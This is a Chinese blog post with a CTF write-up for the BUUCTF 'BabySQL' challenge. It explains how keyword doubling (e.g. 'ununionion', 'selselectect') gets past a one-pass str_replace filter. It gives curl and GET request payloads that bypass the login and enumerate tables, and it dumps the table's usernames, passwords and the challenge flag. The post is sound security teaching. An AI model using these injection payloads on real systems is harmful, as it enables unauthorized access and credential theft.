<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16.png">
  <link rel="mask-icon" href="/images/favicon-128.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhaochoudecat.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="CTF WriteUp: BabySQL题目信息 题目名称：BabySQL 题目类型：Web (SQL注入) 目标地址：http:&#x2F;&#x2F;74f8f143-fc8e-4009-be51-7453322f3bc1.node5.buuoj.cn:81&#x2F;  知识点 SQL注入：通过注入点绕过登录验证并执行任意 SQL 语句 双写绕过：后端对 or、union、select、from、where 等关键词进行">
<meta property="og:type" content="article">
<meta property="og:title" content="9-BabySQL">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/9-BabySQL/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="CTF WriteUp: BabySQL题目信息 题目名称：BabySQL 题目类型：Web (SQL注入) 目标地址：http:&#x2F;&#x2F;74f8f143-fc8e-4009-be51-7453322f3bc1.node5.buuoj.cn:81&#x2F;  知识点 SQL注入：通过注入点绕过登录验证并执行任意 SQL 语句 双写绕过：后端对 or、union、select、from、where 等关键词进行">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-05-01T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-03T04:50:53.600Z">
<meta property="article:author" content="zhaochoudecat">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/9-BabySQL/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>9-BabySQL | zhaochoudecat</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhaochoudecat</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaochoudecat.github.io/2026/05/02/BUUCTF/WEB/9-BabySQL/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saber.jpg">
      <meta itemprop="name" content="zhaochoudecat">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhaochoudecat">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          9-BabySQL
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-05-02 00:00:00" itemprop="dateCreated datePublished" datetime="2026-05-02T00:00:00+08:00">2026-05-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-05-03 12:50:53" itemprop="dateModified" datetime="2026-05-03T12:50:53+08:00">2026-05-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/BUUCTF/" itemprop="url" rel="index"><span itemprop="name">BUUCTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/BUUCTF/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="CTF-WriteUp-BabySQL"><a href="#CTF-WriteUp-BabySQL" class="headerlink" title="CTF WriteUp: BabySQL"></a>CTF WriteUp: BabySQL</h1><h2 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h2><ul>
<li><strong>题目名称</strong>：BabySQL</li>
<li><strong>题目类型</strong>：Web (SQL注入)</li>
<li><strong>目标地址</strong>：<a target="_blank" rel="noopener" href="http://74f8f143-fc8e-4009-be51-7453322f3bc1.node5.buuoj.cn:81/">http://74f8f143-fc8e-4009-be51-7453322f3bc1.node5.buuoj.cn:81/</a></li>
</ul>
<h2 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h2><ol>
<li><strong>SQL注入</strong>：通过注入点绕过登录验证并执行任意 SQL 语句</li>
<li><strong>双写绕过</strong>：后端对 <code>or</code>、<code>union</code>、<code>select</code>、<code>from</code>、<code>where</code> 等关键词进行了过滤（替换为空），但未做多次过滤，因此可以采用双写绕过</li>
<li><strong>堆叠&#x2F;联合查询注入</strong>：使用 <code>UNION SELECT</code> 联合查询获取数据库中的表结构和数据</li>
</ol>
<h2 id="解题思路与详细步骤"><a href="#解题思路与详细步骤" class="headerlink" title="解题思路与详细步骤"></a>解题思路与详细步骤</h2><h3 id="1-信息收集"><a href="#1-信息收集" class="headerlink" title="1. 信息收集"></a>1. 信息收集</h3><p>访问目标网址，是一个登录页面，包含用户名(username)和密码(password)两个输入框，表单提交到 <code>check.php</code>。页面提示：”自从前几次网站被日，我对我的网站做了严格的过滤，你们这些黑客死心吧！！！”，说明后端做了关键词过滤。</p>
<p>使用单引号测试注入：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=admin&#x27;&amp;password=admin</span><br></pre></td></tr></table></figure>
<p>返回 SQL 语法错误，确认存在 SQL 注入漏洞。</p>
<h3 id="2-过滤规则探测"><a href="#2-过滤规则探测" class="headerlink" title="2. 过滤规则探测"></a>2. 过滤规则探测</h3><p>通过尝试不同关键词，观察返回结果（报错 vs 正常），发现以下关键词被过滤（替换为空）：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># === SQL原文: SELECT * FROM users WHERE username=&#x27;$username&#x27; AND password=&#x27;$password&#x27; ===</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 or 是否被过滤</span></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;admin&#x27; or 1=1#&#x27; AND password=&#x27;admin&#x27;</span></span><br><span class="line"><span class="comment"># or 被过滤后: SELECT * FROM users WHERE username=&#x27;admin&#x27; 1=1#&#x27; AND password=&#x27;admin&#x27;  ← 语法错误</span></span><br><span class="line"><span class="comment"># or 未过滤:  SELECT * FROM users WHERE username=&#x27;admin&#x27; or 1=1#&#x27; AND password=&#x27;admin&#x27;  ← Login Success</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=admin&#x27;%20or%201=1%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># 返回语法错误 → or 被过滤</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 双写测试 oorr</span></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;admin&#x27; oorr 1=1#&#x27; AND password=&#x27;admin&#x27;</span></span><br><span class="line"><span class="comment"># 过滤后:  SELECT * FROM users WHERE username=&#x27;admin&#x27; or 1=1#&#x27; AND password=&#x27;admin&#x27;  ← 语法正确</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=admin&#x27;%20oorr%201=1%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># Login Success → 双写绕过成功，确认 or 被过滤</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 union/select 双写</span></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;admin&#x27; union select 1,2,3#&#x27; AND password=&#x27;admin&#x27;</span></span><br><span class="line"><span class="comment"># 过滤后:  SELECT * FROM users WHERE username=&#x27;admin&#x27; 1,2,3#&#x27; AND password=&#x27;admin&#x27;  ← 语法错误</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=admin&#x27;%20union%20select%201,2,3%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># 报错 → union/select 被过滤</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;admin&#x27; ununionion selselectect 1,2,3#&#x27;</span></span><br><span class="line"><span class="comment"># 过滤后:  SELECT * FROM users WHERE username=&#x27;admin&#x27; union select 1,2,3#&#x27;  ← 语法正确</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=admin&#x27;%20ununionion%20selselectect%201,2,3%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># 正常返回 → 双写绕过成功</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 from 双写（information 中的 or 也需双写）</span></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;1&#x27; union select 1,table_name,3 from information_schema.tables where#</span></span><br><span class="line"><span class="comment"># 过滤后:  SELECT * FROM users WHERE username=&#x27;1&#x27; union select 1,table_name,3  information_schema.tables   ← 语法错误</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=1&#x27;%20ununionion%20selselectect%201,table_name,3%20frfromom%20infoorrmation_schema.tables%20whwhereere%201=1%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># 正常返回 → from、where、information 中的 or 均被过滤，双写均可绕过</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 测试 where 双写</span></span><br><span class="line"><span class="comment"># SQL: SELECT * FROM users WHERE username=&#x27;admin&#x27; where 1=1#&#x27;</span></span><br><span class="line"><span class="comment"># 过滤后:  SELECT * FROM users WHERE username=&#x27;admin&#x27; 1=1#&#x27;  ← 语法错误</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=admin&#x27;%20whwhereere%201=1%23&amp;password=admin&quot;</span></span><br><span class="line"><span class="comment"># 正常返回 → where 被过滤，双写 whwhereere 可绕过</span></span><br></pre></td></tr></table></figure>

<p>通过测试确认以下关键词被过滤（替换为空）：</p>
<ul>
<li><code>or</code></li>
<li><code>union</code></li>
<li><code>select</code></li>
<li><code>from</code></li>
<li><code>where</code></li>
</ul>
<h3 id="3-双写绕过技巧"><a href="#3-双写绕过技巧" class="headerlink" title="3. 双写绕过技巧"></a>3. 双写绕过技巧</h3><p>后端使用类似 <code>str_replace([&#39;or&#39;,&#39;union&#39;,&#39;select&#39;,&#39;from&#39;,&#39;where&#39;], &#39;&#39;, $input)</code> 的过滤机制，但只过滤一次。因此可以双写关键词，过滤掉中间的部分后剩下的正好构成原词：</p>
<table>
<thead>
<tr>
<th>原始词</th>
<th>双写形式</th>
<th>过滤后</th>
</tr>
</thead>
<tbody><tr>
<td><code>or</code></td>
<td><code>oorr</code></td>
<td><code>or</code></td>
</tr>
<tr>
<td><code>union</code></td>
<td><code>ununionion</code></td>
<td><code>union</code></td>
</tr>
<tr>
<td><code>select</code></td>
<td><code>selselectect</code></td>
<td><code>select</code></td>
</tr>
<tr>
<td><code>from</code></td>
<td><code>frfromom</code></td>
<td><code>from</code></td>
</tr>
<tr>
<td><code>where</code></td>
<td><code>whwhereere</code></td>
<td><code>where</code></td>
</tr>
<tr>
<td><code>information</code></td>
<td><code>infoorrmation</code></td>
<td><code>information</code></td>
</tr>
<tr>
<td><code>password</code></td>
<td><code>passwoorrd</code></td>
<td><code>password</code></td>
</tr>
</tbody></table>
<h3 id="4-确认注入成功"><a href="#4-确认注入成功" class="headerlink" title="4. 确认注入成功"></a>4. 确认注入成功</h3><p>使用 <code>oorr</code> 绕过登录：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=admin&#x27; oorr 1=1%23&amp;password=admin</span><br></pre></td></tr></table></figure>
<p>返回 <code>Login Success!</code>，获取到 admin 用户的密码哈希 <code>e64a399a69cb527f23ed10d444dd8f61</code>，确认 SQL 注入成功。</p>
<h3 id="5-确定列数"><a href="#5-确定列数" class="headerlink" title="5. 确定列数"></a>5. 确定列数</h3><p>使用联合查询 <code>union select</code> 依次递增列数测试，当列数正确时页面正常返回：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 从1列开始试，直到不报错为止</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=1&#x27;%20ununionion%20selselectect%201%23&amp;password=admin&quot;</span>     <span class="comment"># 报错</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=1&#x27;%20ununionion%20selselectect%201,2%23&amp;password=admin&quot;</span>   <span class="comment"># 报错</span></span><br><span class="line">curl <span class="string">&quot;http://target/check.php?username=1&#x27;%20ununionion%20selselectect%201,2,3%23&amp;password=admin&quot;</span> <span class="comment"># 正常</span></span><br></pre></td></tr></table></figure>

<p>测试得出表为 <strong>3 列</strong>，且返回 <code>Hello 2！</code> 和 <code>Your password is &#39;3&#39;</code>，说明第 2 列显示在用户名位置，第 3 列显示在密码位置。</p>
<h3 id="6-获取数据库信息"><a href="#6-获取数据库信息" class="headerlink" title="6. 获取数据库信息"></a>6. 获取数据库信息</h3><p>获取当前数据库名和版本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">database() → geek</span><br><span class="line">version() → 10.3.18-MariaDB</span><br></pre></td></tr></table></figure>

<h3 id="7-获取表名"><a href="#7-获取表名" class="headerlink" title="7. 获取表名"></a>7. 获取表名</h3><p>查询 <code>information_schema.tables</code>，注意 <code>information</code> 中的 <code>or</code> 需要双写为 <code>infoorrmation</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=1&#x27; ununionion selselectect 1,table_name,3 frfromom infoorrmation_schema.tables whwhereere table_schema=database()%23&amp;password=admin</span><br></pre></td></tr></table></figure>
<p>得到表名：<code>b4bsql</code></p>
<h3 id="8-获取列名"><a href="#8-获取列名" class="headerlink" title="8. 获取列名"></a>8. 获取列名</h3><p>查询 <code>information_schema.columns</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=1&#x27; ununionion selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name=&#x27;b4bsql&#x27;%23&amp;password=admin</span><br></pre></td></tr></table></figure>
<p>得到列名：<code>id</code>, <code>username</code>, <code>password</code></p>
<h3 id="9-获取-Flag"><a href="#9-获取-Flag" class="headerlink" title="9. 获取 Flag"></a>9. 获取 Flag</h3><p>查询 <code>b4bsql</code> 表中所有数据，注意 <code>password</code> 中包含 <code>or</code> 也需要双写：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /check.php?username=1&#x27; ununionion selselectect 1,group_concat(username,&#x27;:&#x27;,passwoorrd),3 frfromom b4bsql%23&amp;password=admin</span><br></pre></td></tr></table></figure>
<p>获取到数据：</p>
<table>
<thead>
<tr>
<th>用户名</th>
<th>密码</th>
</tr>
</thead>
<tbody><tr>
<td>cl4y</td>
<td>i_want_to_play_2077</td>
</tr>
<tr>
<td>sql</td>
<td>sql_injection_is_so_fun</td>
</tr>
<tr>
<td>porn</td>
<td>do_you_know_pornhub</td>
</tr>
<tr>
<td>git</td>
<td>github_is_different_from_pornhub</td>
</tr>
<tr>
<td>Stop</td>
<td>you_found_flag_so_stop</td>
</tr>
<tr>
<td>badguy</td>
<td>i_told_you_to_stop</td>
</tr>
<tr>
<td>hacker</td>
<td>hack_by_cl4y</td>
</tr>
<tr>
<td><strong>flag</strong></td>
<td><strong>flag{fcf209d6-8169-4cc3-b59f-cb43266b1e06}</strong></td>
</tr>
</tbody></table>
<h2 id="最终-Flag"><a href="#最终-Flag" class="headerlink" title="最终 Flag"></a>最终 Flag</h2><p><code>flag{fcf209d6-8169-4cc3-b59f-cb43266b1e06}</code></p>
<h2 id="知识点总结"><a href="#知识点总结" class="headerlink" title="知识点总结"></a>知识点总结</h2><h3 id="双写绕过原理"><a href="#双写绕过原理" class="headerlink" title="双写绕过原理"></a>双写绕过原理</h3><p>当后端使用 <code>str_replace([&#39;or&#39;,&#39;union&#39;,&#39;select&#39;,&#39;from&#39;,&#39;where&#39;], &#39;&#39;, $input)</code> 等函数将危险关键词替换为空字符串时（且只执行一次过滤），攻击者可以通过双写来绕过。</p>
<p><strong>核心理解：过滤器是按关键词子串匹配，不是按整个单词匹配。</strong> 它只查找输入中是否包含这些关键词片段，找到了就删掉。因此双写时只需要重复<strong>被过滤的那个关键词本身</strong>，而不是重复整个单词。</p>
<p>以 <code>information</code> 为例，需要明确一点：<code>information</code> 本身不是过滤关键词，但它<strong>包含</strong>了过滤关键词 <code>or</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">information</span><br><span class="line">  ↑↑</span><br><span class="line">  └─ 过滤器的 `or` 在这里匹配到了</span><br></pre></td></tr></table></figure>

<p>过滤过程：<code>information</code> &#x3D; <code>inf</code> + <code>or</code> + <code>mation</code>，中间的 <code>or</code> 被删掉 → 只剩 <code>infmation</code>（乱码）。</p>
<p>双写时只需在 <code>or</code> 的位置重复一次：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">infoorrmation = inf + or + or + mation</span><br><span class="line">                     ↑_____↑</span><br><span class="line">                     过滤删掉中间的 or</span><br><span class="line">                     ↓</span><br><span class="line">               inf + or + mation = information  ✓</span><br></pre></td></tr></table></figure>

<p>同理其他所有词：</p>
<table>
<thead>
<tr>
<th>单词</th>
<th>包含的过滤关键词</th>
<th>双写方式</th>
<th>原理</th>
</tr>
</thead>
<tbody><tr>
<td><code>select</code></td>
<td><code>select</code></td>
<td><code>sel</code>+<code>select</code>+<code>ect</code> &#x3D; <strong><code>selselectect</code></strong></td>
<td>整体就是关键词，在中间插入一次</td>
</tr>
<tr>
<td><code>union</code></td>
<td><code>union</code></td>
<td><code>un</code>+<code>union</code>+<code>ion</code> &#x3D; <strong><code>ununionion</code></strong></td>
<td>同上</td>
</tr>
<tr>
<td><code>from</code></td>
<td><code>from</code></td>
<td><code>f</code>+<code>from</code>+<code>om</code> &#x3D; <strong><code>frfromom</code></strong></td>
<td>同上</td>
</tr>
<tr>
<td><code>where</code></td>
<td><code>where</code></td>
<td><code>wh</code>+<code>where</code>+<code>ere</code> &#x3D; <strong><code>whwhereere</code></strong></td>
<td>同上</td>
</tr>
<tr>
<td><code>order</code></td>
<td><code>or</code>（包含在其中）</td>
<td><code>or</code>+<code>or</code>+<code>der</code> &#x3D; <strong><code>oorrder</code></strong></td>
<td>只双写 <code>or</code>，不是整体重复</td>
</tr>
<tr>
<td><code>information</code></td>
<td><code>or</code>（包含在其中）</td>
<td><code>inf</code>+<code>or</code>+<code>or</code>+<code>mation</code> &#x3D; <strong><code>infoorrmation</code></strong></td>
<td>只双写 <code>or</code></td>
</tr>
<tr>
<td><code>password</code></td>
<td><code>or</code>（包含在其中）</td>
<td><code>passw</code>+<code>or</code>+<code>or</code>+<code>d</code> &#x3D; <strong><code>passwoorrd</code></strong></td>
<td>只双写 <code>or</code></td>
</tr>
</tbody></table>
<p><strong>一句话总结：看这个单词里哪个子串是被过滤的关键词，就把那个子串写两遍，剩下的部分不动。</strong></p>
<h3 id="过滤词对数据字典的影响"><a href="#过滤词对数据字典的影响" class="headerlink" title="过滤词对数据字典的影响"></a>过滤词对数据字典的影响</h3><p>需要注意过滤词不仅影响 SQL 关键字，也影响数据字典中的字符串（表名、列名等）：</p>
<ul>
<li><code>information</code> 中的 <code>or</code> 会被过滤 → 需双写为 <code>infoorrmation</code></li>
<li><code>password</code> 中的 <code>or</code> 会被过滤 → 需双写为 <code>passwoorrd</code></li>
<li>同理，任何包含过滤关键词的表名&#x2F;列名都需要对应双写</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2026/05/02/BUUCTF/WEB/8-%5BACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B%5Dupload2/" rel="next" title="8-[ACTF2020 新生赛]upload2">
      8-[ACTF2020 新生赛]upload2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#CTF-WriteUp-BabySQL"><span class="nav-number">1.</span> <span class="nav-text">CTF WriteUp: BabySQL</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E4%BF%A1%E6%81%AF"><span class="nav-number">1.1.</span> <span class="nav-text">题目信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">1.2.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%E4%B8%8E%E8%AF%A6%E7%BB%86%E6%AD%A5%E9%AA%A4"><span class="nav-number">1.3.</span> <span class="nav-text">解题思路与详细步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.3.1.</span> <span class="nav-text">1. 信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E8%BF%87%E6%BB%A4%E8%A7%84%E5%88%99%E6%8E%A2%E6%B5%8B"><span class="nav-number">1.3.2.</span> <span class="nav-text">2. 过滤规则探测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="nav-number">1.3.3.</span> <span class="nav-text">3. 双写绕过技巧</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E7%A1%AE%E8%AE%A4%E6%B3%A8%E5%85%A5%E6%88%90%E5%8A%9F"><span class="nav-number">1.3.4.</span> <span class="nav-text">4. 确认注入成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E7%A1%AE%E5%AE%9A%E5%88%97%E6%95%B0"><span class="nav-number">1.3.5.</span> <span class="nav-text">5. 确定列数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF"><span class="nav-number">1.3.6.</span> <span class="nav-text">6. 获取数据库信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-%E8%8E%B7%E5%8F%96%E8%A1%A8%E5%90%8D"><span class="nav-number">1.3.7.</span> <span class="nav-text">7. 获取表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-%E8%8E%B7%E5%8F%96%E5%88%97%E5%90%8D"><span class="nav-number">1.3.8.</span> <span class="nav-text">8. 获取列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#9-%E8%8E%B7%E5%8F%96-Flag"><span class="nav-number">1.3.9.</span> <span class="nav-text">9. 获取 